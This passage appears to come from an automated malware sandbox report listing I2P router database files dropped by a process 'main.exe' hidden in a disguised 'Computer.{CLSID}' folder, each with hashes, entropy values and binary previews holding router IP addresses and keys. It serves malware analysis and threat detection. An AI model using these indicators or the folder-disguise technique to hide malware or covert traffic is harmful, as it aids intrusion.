Preview:	E_...A.......\Q%.._.......6e.X4c.....TR.)....9.v..!.....7....c.....TR.)....9.v..!.....7....c.....TR.)....9.v..!.....7....c.....TR.)....9.v..!.....7....c.....TR.)....9.v..!.....7....c.....TR.)....9.v..!.....7....c.....TR.)....9.v..!.....7....c.....TR.)....9.v..!.....7....c.....TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....J..$ms.....\|....8P....+.C....................p...........SSU2...caps=.B4;.i=,kysBOcWJAkuOfMZSs6oMp1NhK4UTgMXy5t1h8igFySw=;.iexp0=.1726474662;.iexp1=.1726476887;.iexp2=.1726474603;.ih0=,4lORYuNygTUYNcWUze-2W1~xgUT-tT1YrVLQ~0mvODg=;.ih1=,y~6JUuMNo1R8VlMj6oWYXqwqGTK2K~CQ-pUdlClmx7o=;.ih2=,gJ~CLfQo8XCfMMRKb0vGsqG2cMVTUsWle4FaLqOncBo=;.itag0=.1070171410;.itag1=.3358001576;.itag2=.913513486;.mtu=.1420;.s=,fHL-HWjSO-Hd7qOsgcN~LNRTFUB4mr-bd870coOsnA8=;.v=.2;..........NTCP2.@.caps=.4;.s=,Vmw02LHMH-F5GnnZbhsZqHJS-RYVGNKRaoyYztqn3jc=;.v=.2;..,.caps=.PU;.netId=.2;.router.version=.0.9.63;..&a..D?W...P....,...OCO..&gQ.x...r%.....6n.4.t2.=.}..\|.....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r0\routerInfo-0lvM-~59jimcPy41DlLr1sHENdeuG3NutoJ-RV~ktAU=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	812
Entropy (8bit):	6.739716455890191
Encrypted:	false
SSDEEP:	24:1lN16DSxPsxPsxPsxPsxPsxPsxPsxPsxPsx0UULR9Tj:nj6OxPsxPsxPsxPsxPsxPsxPsxPsxPs8
MD5:	6FEA3CCC952282661986658F34488988
SHA1:	3D8A7A7B6D27DAC4E3E6CCD23507996FE11949FD
SHA-256:	CDD4514908075988E064C81954827045E129A6EFB072AC5377C0563A2D425454
SHA-512:	7B1777A45B0AA7405E215442DE93D576F033E0AF27D06E6B8D42CD9E08CD3B2A106B1C7572E9B97719A97B92D390E23C0B1344711321869F1B62D39F0D8B678E
Malicious:	false
Preview:	.&.c.;.....K._T...)...0.Q....&.'.....N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U./..........@.........j......I.........................NTCP2.w.host=.212.118.52.164;.i=.qbMIKyCC~DT9-iRpsnijSA==;.port=.26199;.s=,G1fw5fVzzVjAfAZsOP-JI504GFqOdcHbre4nztYF7mI=;.v=.2;..........SSU2...caps=.BC;.host=.212.118.52.164;.i=,WNxSvE~rW94j7boFNS90YfHDFqP85B58ZTtKrSDgK50=;.port=.26199;.s=,QSxoYzSxmKoWN1qkwhOFFUfe5ujeCgogEp0fsdYrfS8=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.59;....Qpq&m...W.E.......O...........\|.W.F"..... ]...&?.L....\.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r1\routerInfo-1eEB3m1yeJRzMfDK8HO4sE28tURfLcOaVsAKN6FWm-0=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	752
Entropy (8bit):	7.358588075584577
Encrypted:	false
SSDEEP:	12:CC+Czb9DRLZ8HlnykKi7ulIDlFRnTzxJ3ggaJTNTMXAZ0Tc17Y8cqdKhuhhzVKT+:VZzbDZknyt+DlHTVJ3gxNM40Tc17yQhh
MD5:	E967B8BB9D9000DE937244167B8402C6
SHA1:	4F79CB7EA6C48D0FC8F06EB0B3392E0DF1A2F5B7
SHA-256:	A9C0A22796CC0D2F5989F00AFF226A9119AA571188319D620495599D94F33814
SHA-512:	A8E3DC749170591875056576E45B99B8EA0CCF55DDF89A60D6EC78F2ADBBA2CF89296CB6192A8F62196527605696910999B0C521F671AD14824DF8A8F65E2E77
Malicious:	false
Preview:	......N..z.7.U..f. <.*..xB.[y.1E.+...n...z..o.z....M.o.w%?\.m.!.k...3j....).[...#.,7.n.)...(...Y......r..}.v..t.i.yM.+.....ad....s../k.j0......Y.o.......YiKM...1.DE.6..+>O.O.n8....g...q.pk.;..f\|.&'hqZ.Y.....E....3.S.3......}......=.XC...AzX..D.t.O..O.1.JK5..q....e..T.......OO..)p:.O....gCk.-.....:..pwQ....[.Iz}...[...rJ....M..L...!....u.&.g.._..t{...pC...m...x...............SQ...........NTCP2.t.host=.76.23.63.123;.i=.92kxhVaxFHxCtVLca3B-lQ==;.port=.9917;.s=,-VWY6RqeX~JI9nNpTt8vIyjhqjdzLqSdhEkBgyDq8F0=;.v=.2;..........SSU.].caps=.BC;.host=.76.23.63.123;.key=,vaCxQmCfnxdgQgtbUgIxXOv2eOtHIamrqcDwPqJJn74=;.port=.9917;..,.caps=.PR;.netId=.2;.router.version=.0.9.54;.D..Q....j.R....}tx.Z.O...C...R.F.....2......{.qS.{.UW.u..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r3\routerInfo-37UULZlUSPJ2rVQIZP-j7snllCLbwgJ836ADWzVPATE=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	OpenPGP Secret Key Version 6, Created Tue Aug 23 18:28:58 2022, Unknown Algorithm (0xc0); Secret Subkey
Category:	dropped
Size (bytes):	1342
Entropy (8bit):	6.991922963598879
Encrypted:	false
SSDEEP:	24:q25LM4Klaam/NHLPCeDRd75sRLev9r2rnvybJyVzar8Vzb6SlB0:qcLaHwLqmd5gSv9W2svpr0
MD5:	5F7472815776E051CE0FBC9A41C270B4
SHA1:	2CE2ED3123BE03DEF5F3CB3B92FC67D8E907DB53
SHA-256:	5E4CE8F08A676434345B0BCBF8D788786171BEF903D156630180A92986E6E6EB
SHA-512:	5C027DD0E9FB4DC8EAB30032240DDF4D8BA08B87FA41580C530FDA0A92630D688033D49062546C0137422A2A54168BF07DB9DDE2ABF70A3F332A9EF9D3501417
Malicious:	false
Preview:	.\.c..j.........g@5..../.."...vs+g...N..i.:..`T.u.s.Zg.g...+.a=.F..N...l.uh8.\Y...ma.....2.b..@...~. 5I../.e.p...\|.CM./J(p9.....c$?w>.Z.........d..e.....L6.d.....vL..>..4.....J.c.z.99.....G.Y..e..o}YGA....LwJ...K...\|N.c[.t.....`\c..I..l't.B.D ..cU.@....&rI..)xq..~......\|..>.....P=.n.,".n9...v...P%.^..Si..X.I...5.+$O......MR..G..6.gv....TL.n...+.Y...._.H..................9............NTCP2.@.caps=.6;.s=,d9VHkRFV1p8SdWjfKOaWLoq2KnRGxwaZtsTiiueYmBk=;.v=.2;..........NTCP2.w.host=.188.187.151.89;.i=.~W8umxSDJpWQo9-dH2wKVw==;.port=.26647;.s=,d9VHkRFV1p8SdWjfKOaWLoq2KnRGxwaZtsTiiueYmBk=;.v=.2;..........SSU2.\|.caps=.B6;.i=,b4EkISX0M69JPgXHs6iUdjdiC9XB8kZq8LLZzV6HMx8=;.iexp0=.1722821286;.iexp1=.1722821286;.iexp2=.1722821286;.ih0=,C9QjuFiEWzEOYXzy0sE6eGVgzweoA4HAHxBkf3~erno=;.ih1=,sbnqEwhaxGnkVfKpdxscBzTfC7EDzMX5iky35IriM6M=;.ih2=,wliDyQAGUCHv0TvXxQSW9mUYykOMgDY1DOehYZIZ~Q8=;.itag0=.122192359;.itag1=.1474200835;.itag2=.3682003260;.s=,KRtFX6HV6-slRwn9CJHbWRFDOyEHfssPh68OqQ

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r3\routerInfo-39mQBN~Xx-RutvVsYd9vu4LiUA7b0LlS4oQZdwXhMvc=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	987
Entropy (8bit):	6.690592718699463
Encrypted:	false
SSDEEP:	12:H7R3udJJJJJJJJJ4kNqxBpoHJWE/euPsWWh5+59RERTeePXX9JoCqdlYJNoeJ:bFusjDoen9hQiTeePnynYJjJ
MD5:	1FC6C0A1178040A148EC0DED854C0E80
SHA1:	22489FA946964BCC2DC01683A62050D20C021BE2
SHA-256:	E2E73BCC0CFD51345383C4128CD0C8AC962106C82ADE83788A72762DC922955F
SHA-512:	26EB45A2EFB9CE96C342E9E0E15046C80FE9A32A9D23BEB734DE9106000077AC316F6E7F59644E9A26A480AB29EE192FA97CE3B2708FE82976BD74C8D47172F1
Malicious:	false
Preview:	.D..9.X.#%v1.4."7N'..I.2.......F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o..........#.7..'.......q.....P...............V...........NTCP2.@.caps=.4;.s=,X0r40rSuVuT8yEWexIVMngftEgoyG2oToSSxbCnjjk8=;.v=.2;..........SSU2.{.caps=.4;.i=,WjIvHUqt1q8AOrQWnAF6RbgIKMftcpn4QE65VOMmozs=;.iexp0=.1726476589;.iexp1=.1726476936;.iexp2=.1726477045;.ih0=,5UHTARL1Qf8gs0fm1jVToRmdJlNOmR05cK75E7HwKEI=;.ih1=,R0V5AytBq91nwRIAibRhPZvRAnY6ximlBTmLYgYr9CQ=;.ih2=,RO~8RMe7BAk8SsN0RN9IW52P2lVXanT~1wMyMFMvWU8=;.itag0=.2374885053;.itag1=.667188015;.itag2=.2448421539;.s=,fjLGGjBD~z44q6qpeNRLnAhmp5OcXa2x7skik2~Fnls=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.63;.....x.._.K7..ftu.+...i.5.\|@.Qgvxw.....7,]~1.u3... ....E...'..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r3\routerInfo-3cp44n122W~vysfnwXfd02kF6bg586W3GkJDICii05U=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1292
Entropy (8bit):	6.67336120344388
Encrypted:	false
SSDEEP:	24:m1KKKKKKKKKjvbTeE/wvnaFjHzOQuUoe3uPMQSmRPnawmb:mivbd5zOQuA3sMRkiws
MD5:	6A2CCE017AC9D21F790B1A9C54641781
SHA1:	3425BADB0CCA2127E52F6033546A530562263282
SHA-256:	1BBBC4913D1EB9EAD559964658C90C35F9E34EDDCD5C1CFECE796868E731EDAB
SHA-512:	D18B9CFE6D77002A8742BD76381F60B997FF28B839BA44FCBB9D8C8A8ED719F3D3420AB4DE3E3DFC53AAB296C64D67D57BA734FEE21D5F649CBA0A21842B55D8
Malicious:	false
Preview:	Z.:%...."&..<.\.:^.....6p.eW.M5Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y....k...v...^$...oa.....\ze.T.ur..............p...........NTCP2.s.host=.68.1.55.11;.i=.NIYAsQ0xcj1vfKsbfDs5fQ==;.port=.26636;.s=,mDegBscLGXMOPcmzHGmgGDVTkR3qKW3SGc0~o70FtjY=;.v=.2;..........NTCP2.@.caps=.6;.s=,mDegBscLGXMOPcmzHGmgGDVTkR3qKW3SGc0~o70FtjY=;.v=.2;..........SSU2...caps=.BC;.host=.68.1.55.11;.i=,WmAc9WmKEZ4WUs-ct6Q6xuvqrdMkNqcGFJ-Emf-EvNA=;.port=.26636;.s=,tqMtzZhJC73JO15QuUavwuE~cPEquJqFIpxJjMP2HiQ=;.v=.2;..........SSU2...caps=.6;.i=,WmAc9WmKEZ4WUs-ct6Q6xuvqrdMkNqcGFJ-Emf-EvNA=;.iexp0=.1726474364;.iexp1=.1726474363;.iexp2=.1726474392;.ih0=,ZLSupHTpZRIxZ99ntg1SQEd-TFGMbsAe~~LK2Mq1F2U=;.ih1=,wRAqyBWGQTk2m0G4G8BcjJveW~6vID9FRg0Cck

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r3\routerInfo-3pfF~BopQHD-YeXNVmmUx1yvzHTBDiGCXGhrTc2~H7s=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	6.708994151480675
Encrypted:	false
SSDEEP:	24:L7KYfAMKY0gGWxN2OGWP2CdVaafwepFwr0:L7H0uzoepl
MD5:	78E83F5E473807EE81DBC80B214D2ED2
SHA1:	AB49C43C0760D88991EDF616978E00E375949CF1
SHA-256:	A9144E37A684D7733C756FD21E5153AE0569DA5117F9E1B31A04887ED2307BD3
SHA-512:	B79B896E91DF009C7AE1584B09EF3395D166D9909E7A56AB740223CF76A928BACFA58C3017AADB342B5057B392131B89BA7A1FF288081D39E8BCF5E1A73050B5
Malicious:	false
Preview:	...^.........}...'.5.....n....k.%..^.tj.gK2...V....v.7.Y.nM...%..^.tj.gK2...V....v.7.Y.nM...%..^.tj.gK2...V....v.7.Y.nM...%..^.tj.gK2...V....v.7.Y.nM...%..^.tj.gK2...V....v.7.Y.nM...%..^.tj.gK2...V....v.7.Y.nM...%..^.tj.gK2...V....v.7.Y.nM...%..^.tj.gK2...V....v.7.Y.nM...%..^.tj.gK2...V....v.7.Y.nM...%..^.tj.gK2...V....v.7.Y.nM.. Hw.)Sy{J.~.pwb]....,7......1&..........................NTCP2.w.host=.139.162.110.14;.i=.uvbv4aj5GiqYOFobRgHeEA==;.port=.22293;.s=,Vg68iPl9pdbc4-SEDoQVZTCgfDm3QHvk9H7WLCNj0ng=;.v=.2;..........NTCP2...host=.2400:8902:e002:2300::1;.i=.uvbv4aj5GiqYOFobRgHeEA==;.port=.22293;.s=,Vg68iPl9pdbc4-SEDoQVZTCgfDm3QHvk9H7WLCNj0ng=;.v=.2;..........SSU2...caps=.BC;.host=.139.162.110.14;.i=,hFrZ40LtRmfUFkuvnh-tIuNIeVAUBtx1FPjsX4eG6lc=;.port=.22293;.s=,SSod72w94SzCZIHukx7g1DcepGz5skevJgsXRz0S4i4=;.v=.2;..........SSU2...caps=.BC;.host=.2400:8902:e002:2300::1;.i=,hFrZ40LtRmfUFkuvnh-tIuNIeVAUBtx1FPjsX4eG6lc=;.mtu=.1500;.port=.22293;.s=,SSod72w94SzCZIHukx7g1D

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r4\routerInfo-4d6dlsSQSOs9-TpDsmOGRxDV-xZO7RSsWkKUaKEjkCo=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	988
Entropy (8bit):	7.241959838492758
Encrypted:	false
SSDEEP:	24:OFTxAij8wDJBSiCTLvTy5mekoQuOCB2sp166uPQwDuR24NkHD0C:ah3YLImekoQtAp06GqIn
MD5:	386005CBCDFAAA703F8E760A2D30EB92
SHA1:	680D51C5A1A7375DBF587800DEA3CBE4AFE980AB
SHA-256:	6F31A5816BA0780239A90180F40FC1D88793730AFBD0AAADA3B309D3255D8B93
SHA-512:	2C2191B7583220E629F9AA0F78EEE00A0868E438032BC1F8B2623A29EC959A74D13C45EA4F0338047D84AA6B3688FD429CD521AC9B3F365370731D48D1009290
Malicious:	false
Preview:	.....M@[.....4...yA..:Xx#W.=.0..*............w(.:.x4........^Z.X..qnFV.x.wJ.zn.#...X. ....<.a....:..`Z$^.,..'zH.W..e.) N..uQ:...C.....Q=...`z.c.y...h.V`x.P..w2.".....V;.G.#}..F.....Qt.=.h.^d.t..]..s,b...m.\|...X..v^..1....?......1[..&.(1?.j....._s.I.H.....Z.$....;...K?.w;....i....]....j....T,I.....A}...z4n..T..S.;t.L.%..NP.. ..U.2....rY:.i...3.h.[...............................NTCP2.@.caps=.4;.s=,Z2-4omkN8NwVw4Vf-tDhg~j5t-edFyoc1umdMlfF9yY=;.v=.2;..........SSU2.\|.caps=.4;.i=,5QdUNUUTjVCOTUkCJPvJVZ9ebsAqr5vjSJvM8rinztA=;.iexp0=.1726480311;.iexp1=.1726480245;.iexp2=.1726480245;.ih0=,-e0SW5rDvxh2vRCfJNNAUGBy8gYaS-s8Sxze7uFHjkE=;.ih1=,aeem9xeOtL2aUPTcp8OBJZltJW6TeDsxvnBpyzNRDUs=;.ih2=,NOnV511ghllUPy7LOANQx27OJ3pssEWXusswtP4QSgM=;.itag0=.2298829326;.itag1=.3030499843;.itag2=.2591940804;.s=,F1uL04bVW0LeacJ85hIiy6clkxjQZCMI~BYQ5bAh8xY=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.56;.{.e.[.7@..._...:W...Jk!.3.1C...9O5.w...OO..)on..Z.&!.UK.R..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r4\routerInfo-4e5Os1o4qV4lRhu33MS6rd-yO~70hpOfmm4sQK846-E=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	885
Entropy (8bit):	6.667786076645771
Encrypted:	false
SSDEEP:	12:9zOOOOOOOOOW4K4VHcSXymDdgeAWNZKSEL6iuGDEY98JCKSEL7hAiuGDEYiEVWFA:56yyKDWzEGiHJEJAiHXMi
MD5:	9D251229B6EB5BBA3F6FDEE13B3FA61D
SHA1:	428F86E3BF6FF7659CC520FDC0AE2C0C920BF582
SHA-256:	033631D36946E2632DCA081BA24301AFD0C96CC656CB868C8006C1F41478099E
SHA-512:	44AF93371C83A86961339839ED77590E97B13E8503FBE8373A169BE5EDA065280EBD630CA6CE3A5BE86E3D8A5F6B7CB5EFA2A39339F82E9E5F1F18F516D9D2FB
Malicious:	false
Preview:	;!.9..A....]C..z......Z+S........G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..N..9._...(.x..`.........[...............%...........NTCP2.A.caps=.46;.s=,yWFEXZhDFau~i1hJiKUpf-KijMpiEw2QwsXqn3xj0Ws=;.v=.2;..........SSU2...caps=.C;.host=.81.183.201.129;.i=,aNSKfwLnGE9G7dOS2gXsy1Li-CXEwcuQvXTGzIUqJEw=;.port=.9732;.s=,15kl1m7irUNT7TV24r5fk2jVRDTqS2lxgCxFZpe8bkw=;.v=.2;..........SSU2.q.caps=.6;.i=,aNSKfwLnGE9G7dOS2gXsy1Li-CXEwcuQvXTGzIUqJEw=;.s=,15kl1m7irUNT7TV24r5fk2jVRDTqS2lxgCxFZpe8bkw=;.v=.2;..,.caps=.XR;.netId=.2;.router.version=.0.9.62;.v...C.\?..r..}..i.C..S.S....o.. .t..K)&.......cp...Y..o...uR..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r6\routerInfo-6VTTG3QL4a1v9RhIlR8Gtriarb0k-CQSp8fbNefbUic=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1147
Entropy (8bit):	6.5974977076848775
Encrypted:	false
SSDEEP:	24:zjKtVKtVKtVKtVKtVKtVKtVKtVKtVKtqb3d3Smgv3dZ6rxBM6rxB1/XF:zsxbAviBMiB19
MD5:	2E0FE5B6360D1936C9DC0558F866B68D
SHA1:	E9E45994EFFD5269DB72F11CFC67A6629B2965CB
SHA-256:	1E7D269A2E50A292BC8087402E96F0223C76CDFD3DBC1B2645EA6A4EEB2F2C63
SHA-512:	DA86B8EDA2F9009C4159847ADA237287F0440ECD17E107766BBA3C6653804EF3E6005B270B0DDE9A6405796A9133EE9BBAAD204AEC86E2C1F0C1745D30E9F591
Malicious:	false
Preview:	.D2........W.Lj.QF..LNpq.?b.hw....o.T[..1\|.......o5.@..e.~..a....o.T[..1\|.......o5.@..e.~..a....o.T[..1\|.......o5.@..e.~..a....o.T[..1\|.......o5.@..e.~..a....o.T[..1\|.......o5.@..e.~..a....o.T[..1\|.......o5.@..e.~..a....o.T[..1\|.......o5.@..e.~..a....o.T[..1\|.......o5.@..e.~..a....o.T[..1\|.......o5.@..e.~..a....o.T[..1\|.......o5.@..e.~..a.Y0).C)..J...........7.y..YG2............$..V...........NTCP2...host=!2600:3c00:0:0:f03c:93ff:fe21:fcc7;.i=.zAuH3HhKHZs4pc2aAmKLJg==;.port=.23016;.s=,b6MSxMHwK~mWQukmtDGmR2p9jF0fmzid08ejQT96cgI=;.v=.2;..........NTCP2.u.host=.66.228.49.30;.i=.zAuH3HhKHZs4pc2aAmKLJg==;.port=.23016;.s=,b6MSxMHwK~mWQukmtDGmR2p9jF0fmzid08ejQT96cgI=;.v=.2;..........SSU2...caps=.BC;.host=!2600:3c00:0:0:f03c:93ff:fe21:fcc7;.i=,lno3X0edF1WvVashRbps6Tfvcu3HyW25Vn~n2BEOlig=;.port=.23016;.s=,mfB4XyWlN5A-B6STb6b4l3f5R~8fggVGVJTk~DNstBw=;.v=.2;..........SSU2...caps=.BC;.host=.66.228.49.30;.i=,lno3X0edF1WvVashRbps6Tfvcu3HyW25Vn~n2BEOlig=;.port=.23016;.s=,mfB4XyWlN5A-B6S

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r7\routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1211
Entropy (8bit):	6.665753428190035
Encrypted:	false
SSDEEP:	24:HsfVvAAAAAAAAAC2zLA/56fPX3LA/56fHSsnP5lPXzSsnP50fcKO0:HstvAAAAAAAAACxsfPws/rfPjrSfc4
MD5:	E832A94D27826CE4D04620E4B3309B88
SHA1:	8D6FC56BC2D7EE3F578058CD783DAD59B74BC099
SHA-256:	21ECDCB61FFE3D1B2F64CF7798967D1A37D6587A8F768CD98E5D08ED908EE664
SHA-512:	EB8838650C2341ACA0F1E5F6D895A6C2152618FB9A4A060EAC21C92A5A4B611D84ED6F9C0E7616CA6917FC0D5C78663ACB1BAFD46EB96C64B63F40EBE37110D7
Malicious:	false
Preview:	.4....?...L........a....F[p-.m.a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..j...+.-.<M./.../Q.KK$..].O..%..............(c...........SSU2...caps=.BC;.host=%2001:a62:1a13:901:2a13:4fbc:9aef:63e3;.i=,J3qQm2CJ56a8UqJ7hPo6z5UMcEuauLlCQgyHZqRzEyQ=;.port=.11724;.s=,VpOgaYdd5SGDuQzp47RjP74KaUcHk3docSvVe7-sZmA=;.v=.2;..........SSU2...caps=.B;.host=.188.174.130.9;.i=,J3qQm2CJ56a8UqJ7hPo6z5UMcEuauLlCQgyHZqRzEyQ=;.port=.11724;.s=,VpOgaYdd5SGDuQzp47RjP74KaUcHk3docSvVe7-sZmA=;.v=.2;..........NTCP2...host=%2001:a62:1a13:901:2a13:4fbc:9aef:63e3;.i=.-egS0hlkC112KK6gyTYgBw==;.port=.11724;.s=,~AmmMkczQtvVyBqzHuLjYis-WQhuK0v-LNAsrDj7tAQ=;.v=.2;..........NTCP2.v.host=.188.174.130.9;.i=.-egS0hlkC112KK6gyTYgBw==;.port=.11724;.s=,~AmmMk

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r7\routerInfo-7zweweHTTQkKbEN2ly6miJw-w~Vz0rts~G2Y~hCm8Ro=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PDP-11 overlaid pure executable not stripped
Category:	dropped
Size (bytes):	806
Entropy (8bit):	6.663323014094592
Encrypted:	false
SSDEEP:	24:ckEc0MEMEMEMEMEMEMEMEMEM8zJPT2PYOJrIMRP:ckEc0JJJJJJJJJ3zd2hrRP
MD5:	BF47A73FD7E5494275743144E0735AAF
SHA1:	0A1D6A677A9C9F26C12F9C52F5ED93D7D010378B
SHA-256:	FD259FB7E8043E1A4B1F849937F458D56AFB0198DDC7BE2E3B48E3D696ECA994
SHA-512:	324D7864C221F08435501C670BE33F1661106E11DA08E7F844F6A075C56522088EA2BDD00963E1150AC67EE846EB0D3F1B9DEB99C7280A3FA57CD811E38DC496
Malicious:	true
Preview:	...(.....b.5`N..4.A.+.....U..^iq\|..R..3+..j....Z.PD8.....c..iq\|..R..3+..j....Z.PD8.....c..iq\|..R..3+..j....Z.PD8.....c..iq\|..R..3+..j....Z.PD8.....c..iq\|..R..3+..j....Z.PD8.....c..iq\|..R..3+..j....Z.PD8.....c..iq\|..R..3+..j....Z.PD8.....c..iq\|..R..3+..j....Z.PD8.....c..iq\|..R..3+..j....Z.PD8.....c..iq\|..R..3+..j....Z.PD8.....c.......\|..,=.`...\|0..O......v.........................NTCP2.t.host=.66.78.40.49;.i=.GTn1UdCBzrv97kCLXwvBnQ==;.port=.20105;.s=,r3v7RMN5uJTBwUyev07j1YckwXEYfcbf-rCEv6IY5Cg=;.v=.2;..........SSU2...caps=.BC;.host=.66.78.40.49;.i=,77rhEt7PKYrc9q7VcRCmeROnjm4ssaAewVxN9SRDr8k=;.port=.20105;.s=,wLLseBKaImd5M98ACR5uq3wO9fE8~aZOI7SkVATYwkI=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.62;...Y(k."%.;.&:...8P0{j..0..<[.i......-*..Q..6..:....Y..n...f=.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r8\routerInfo-8d~~Du~vymbeqVOD~A2Nci-OztJ~CmZfcLy37c3eor4=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	808
Entropy (8bit):	6.702200965611099
Encrypted:	false
SSDEEP:	12:imO/wuwuwuwuwuwuwuwuwuwKQwnXwiHCJIcB4fZgsK0SywJp1iwE:iOLLLLLLLLLKRAiHC+Jf+R0gviwE
MD5:	92D3042ED1C342AEFF16E798C504343D
SHA1:	93A3E78DAE886268E85BF9DD02F67FBB9F66794F
SHA-256:	CB1913A07DB3507E4AE740F6FF4A6940D47F218579A2DAD2F59B6ADF959CD842
SHA-512:	290B683FE215F807C44F6F02594D5C0CC32645AE2AB0AF142936FE80418121CFFD02CCAA0D487EB04F08B57E28A511193FF36A4034133BA2D2728B4381631FB3
Malicious:	false
Preview:	O^b.I)....gV.......!..."V.....)-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\.3.W...YY......".M.HDb.{..P...........................NTCP2.u.host=.2.135.133.55;.i=.Og2iVtxfAr-CsVBzZQDuSA==;.port=.12868;.s=,kqpXdXUf3U-2hTazdLn5~KkxTHFbgZnpTBNuqLlzPn0=;.v=.2;..........SSU2...caps=.BC;.host=.2.135.133.55;.i=,5X87B1MAnl9QBtuwcr8fNM5JhD1600VGtUtE~hMR58A=;.port=.12868;.s=,3nLYWh8FSy125DwQZOR9rKStSBSzt10u20x11dAWAkQ=;.v=.2;..,.caps=.OR;.netId=.2;.router.version=.0.9.63;........s..WTl.......K^..J...~..E..r,t..........n...;._tT..

